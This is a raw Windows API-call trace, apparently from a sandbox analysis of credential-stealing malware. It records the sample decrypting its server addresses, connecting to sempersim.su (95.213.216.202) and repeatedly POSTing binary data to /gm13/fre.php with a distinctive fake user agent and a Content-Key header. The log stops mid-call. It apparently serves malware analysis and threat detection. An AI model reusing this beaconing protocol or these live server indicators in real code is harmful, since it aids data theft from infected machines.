[0162.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.705] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0162.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.706] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.707] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.707] GetProcessHeap () returned 0x620000 [0162.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0162.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.708] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435f0, pdwDataLen=0x19fcfc | out: pbData=0x6435f0, pdwDataLen=0x19fcfc) returned 1 [0162.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.709] CryptDestroyKey (hKey=0x62d190) returned 1 [0162.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.710] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0162.710] GetProcessHeap () returned 0x620000 [0162.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0162.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.711] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0162.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.712] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0162.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.777] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0162.777] GetProcessHeap () returned 0x620000 [0162.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0162.777] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6442b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0162.913] GetProcessHeap () returned 0x620000 [0162.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0162.913] socket (af=2, type=1, protocol=6) returned 0x310 [0162.914] connect (s=0x310, name=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0162.967] FreeAddrInfoW (pAddrInfo=0x6442b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eac0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0162.967] GetProcessHeap () returned 0x620000 [0162.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0162.967] GetProcessHeap () returned 0x620000 [0162.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0162.968] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0162.969] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0162.969] GetProcessHeap () returned 0x620000 [0162.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0162.969] GetProcessHeap () returned 0x620000 [0162.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0162.970] GetProcessHeap () returned 0x620000 [0162.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643518 [0162.970] GetProcessHeap () returned 0x620000 [0162.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0162.970] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0162.971] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0162.971] GetProcessHeap () returned 0x620000 [0162.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0162.971] GetProcessHeap () returned 0x620000 [0162.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0162.972] send (s=0x310, buf=0x63a880*, len=237, flags=0) returned 237 [0162.972] send (s=0x310, buf=0x6421e0*, len=159, flags=0) returned 159 [0162.972] GetProcessHeap () returned 0x620000 [0162.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0162.972] recv (in: s=0x310, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0164.942] GetProcessHeap () returned 0x620000 [0164.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0164.942] GetProcessHeap () returned 0x620000 [0164.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643518 | out: hHeap=0x620000) returned 1 [0164.943] GetProcessHeap () returned 0x620000 [0164.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0164.943] GetProcessHeap () returned 0x620000 [0164.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0164.943] closesocket (s=0x310) returned 0 [0164.945] GetProcessHeap () returned 0x620000 [0164.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0164.945] GetProcessHeap () returned 0x620000 [0164.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0164.945] GetProcessHeap () returned 0x620000 [0164.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0164.945] GetProcessHeap () returned 0x620000 [0164.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0164.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1354) returned 0x310 [0164.949] Sleep (dwMilliseconds=0xea60) [0164.966] GetProcessHeap () returned 0x620000 [0164.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f30 [0164.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0164.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0164.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0164.991] GetProcessHeap () returned 0x620000 [0164.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0164.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0164.992] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0164.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0164.993] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0164.998] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.998] GetProcessHeap () returned 0x620000 [0164.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0164.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.000] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f30, pdwDataLen=0x19fcfc | out: pbData=0x642f30, pdwDataLen=0x19fcfc) returned 1 [0165.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.001] CryptDestroyKey (hKey=0x62d710) returned 1 [0165.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.002] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0165.002] GetProcessHeap () returned 0x620000 [0165.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0165.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.003] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.004] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.005] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.006] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.006] GetProcessHeap () returned 0x620000 [0165.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0165.006] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0165.006] GetProcessHeap () returned 0x620000 [0165.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0165.007] GetProcessHeap () returned 0x620000 [0165.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0165.007] GetProcessHeap () returned 0x620000 [0165.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0165.008] GetProcessHeap () returned 0x620000 [0165.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0165.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.009] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0165.025] GetProcessHeap () returned 0x620000 [0165.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0165.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.027] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0165.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.030] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.031] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.031] GetProcessHeap () returned 0x620000 [0165.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0165.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.033] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0165.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.034] CryptDestroyKey (hKey=0x62d190) returned 1 [0165.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0165.034] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0165.034] GetProcessHeap () returned 0x620000 [0165.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0165.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.036] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0165.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.037] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0165.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0165.038] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0165.038] GetProcessHeap () returned 0x620000 [0165.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0165.038] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x643d88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0165.040] GetProcessHeap () returned 0x620000 [0165.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0165.040] socket (af=2, type=1, protocol=6) returned 0x314 [0165.040] connect (s=0x314, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0165.093] FreeAddrInfoW (pAddrInfo=0x643d88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0165.093] GetProcessHeap () returned 0x620000 [0165.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0165.093] GetProcessHeap () returned 0x620000 [0165.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0165.093] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0165.094] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0165.094] GetProcessHeap () returned 0x620000 [0165.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0165.094] GetProcessHeap () returned 0x620000 [0165.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0165.095] GetProcessHeap () returned 0x620000 [0165.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642dc8 [0165.095] GetProcessHeap () returned 0x620000 [0165.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0165.096] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0165.097] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0165.097] GetProcessHeap () returned 0x620000 [0165.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0165.097] GetProcessHeap () returned 0x620000 [0165.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0165.097] send (s=0x314, buf=0x63a880*, len=237, flags=0) returned 237 [0165.098] send (s=0x314, buf=0x6421e0*, len=159, flags=0) returned 159 [0165.098] GetProcessHeap () returned 0x620000 [0165.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0165.098] recv (in: s=0x314, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0166.747] GetProcessHeap () returned 0x620000 [0166.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0166.747] GetProcessHeap () returned 0x620000 [0166.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0166.748] GetProcessHeap () returned 0x620000 [0166.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0166.748] GetProcessHeap () returned 0x620000 [0166.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0166.749] closesocket (s=0x314) returned 0 [0166.749] GetProcessHeap () returned 0x620000 [0166.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0166.749] GetProcessHeap () returned 0x620000 [0166.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0166.750] GetProcessHeap () returned 0x620000 [0166.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0166.750] GetProcessHeap () returned 0x620000 [0166.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0166.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x120c) returned 0x314 [0166.752] Sleep (dwMilliseconds=0xea60) [0166.760] GetProcessHeap () returned 0x620000 [0166.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0166.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.770] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0166.780] GetProcessHeap () returned 0x620000 [0166.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0166.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.782] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0166.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.783] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.783] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.783] GetProcessHeap () returned 0x620000 [0166.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0166.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.785] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0166.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.786] CryptDestroyKey (hKey=0x62d710) returned 1 [0166.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.786] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0166.786] GetProcessHeap () returned 0x620000 [0166.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0166.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.787] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0166.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0166.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0166.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0166.790] GetProcessHeap () returned 0x620000 [0166.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0166.790] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0166.790] GetProcessHeap () returned 0x620000 [0166.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0166.790] GetProcessHeap () returned 0x620000 [0166.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0166.791] GetProcessHeap () returned 0x620000 [0166.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0166.791] GetProcessHeap () returned 0x620000 [0166.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0166.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0166.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0166.809] GetProcessHeap () returned 0x620000 [0166.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0166.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.810] CryptImportKey (in: hProv=0x63ba90, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0166.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.811] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0166.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.812] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0166.812] GetProcessHeap () returned 0x620000 [0166.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0166.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.813] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0166.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.814] CryptDestroyKey (hKey=0x62d710) returned 1 [0166.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0166.815] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0166.815] GetProcessHeap () returned 0x620000 [0166.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0166.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.816] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0166.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0166.817] StrStrA 